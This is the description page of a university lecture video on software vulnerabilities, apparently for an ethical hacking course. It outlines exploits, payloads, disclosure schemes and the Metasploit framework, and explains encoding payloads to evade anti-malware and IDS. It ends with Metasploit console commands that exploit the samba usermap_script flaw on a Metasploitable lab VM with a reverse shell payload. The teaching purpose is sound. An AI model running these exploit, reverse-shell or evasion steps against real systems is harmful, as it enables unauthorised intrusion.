behaving badly

behaving badly

Software Vulnerabilities: Computer Security Lectures 2014/15 S2

1d ago
SOURCE  

Description

This video is part of the computer/information/cyber security and ethical hacking lecture series; by Z. Cliffe Schreuders at Leeds Beckett University. Laboratory work sheets, slides, and other open educational resources are available at http://z.cliffe.schreuders.org. The slides themselves are creative commons licensed CC-BY-SA, and images used are licensed as individually attributed. Topics covered in this lecture include: Programs behaving badly Software vulnerabilities Exploits Exploitation Payloads A payload is the malicious code that is consequently run on the target system, if the exploit is successful Common types of vulnerabilities / payloads Information leaks Denial of service (DoS) Arbitrary code execution: the attacker can run code/commands Specific database/shell commands The execution of machine code Bind shell Reverse shell Privilege Escalation Vertical privilege escalation Access to resources for higher privilege users or applications Horizontal privilege escalation Access to resources for other users or applications Window of vulnerability A zero day security vulnerability is a new security problem that has been discovered Vulnerability disclosure Responsible disclosure Full disclosure Vulnerability reward schemes.. Google Vulnerability Rewards Program Reward schemes generally require 'responsible disclosure' Facebook Responsible Disclosure Policy Vulnerability reward schemes Others such as TippingPoint, Secunia, and iDefense will pay for exploits against popular vendors Bugcrowd Project Zero In 2014 Google started Project Zero Auditing and permission “Ethical hacking”, basically means you have legal permission to do a security audit Updating: Keeping software up-to-date so that you have all the vendor-supplied fixes Patching Could be source or binary changes More mitigation... Vulnerability analysis scanning Checking against databases of known vulnerabilities (automated using tools such as Nessus or manually checking advisories) Penetration testing... Metasploit framework (MSF) Developed by HD Moore The framework is FOSS, with some proprietory interfaces, now owned by Rapid7 Highly modular: can easily combine different exploits and payloads Much more flexible than the manual method of altering exploits programmed in C Metasploit framework (MSF) Includes an extensive library of modules Exploits Payloads Encoding Post-exploitation actions MSF exploits MSF contains over 1000 exploits, including: OS flaws: Windows, Linux, Mac, ... Services: Apache, IIS, … Applications: Adobe Reader, IE, Firefox, … Web apps: some new support MSF payloads MSF contains many payloads: msfpayload -l | less Most target specific platforms bind or reverse shells, VNC, etc MSF encode MSF can encode exploits/payloads to avoid detection Alternative instructions Encrypt instructions, along with decrypt code Similar to how polymorphic viruses avoid detection Can also bind and convert payloads to executables Lots of encoding methods: msfencode -l MSF interfaces Msfcli: command line Msfconsole: console (very powerful) Metasploit Community / Pro: proprietory web interfaces and additional tools Armitage: FOSS GUI Steps of using MSF to exploit Specify the exploit to use Set options for the exploit (such as the IP address of the computer to attack) Choose a payload (this defines what we end up doing on the compromised system) Optionally choose encoding to evade security monitoring such as anti-malware, intrusion detection systems (IDS), and so on Launch the exploit Example (vs Metasploitable) use exploit/multi/samba/usermap_script show options set RHOST {Metasploitable-IP-Address} show payloads set PAYLOAD cmd/unix/reverse set LHOST {Your-Kali-IP-Address} set LPORT {Your-Choice-of-Port} check exploit Malware and vulnerabilities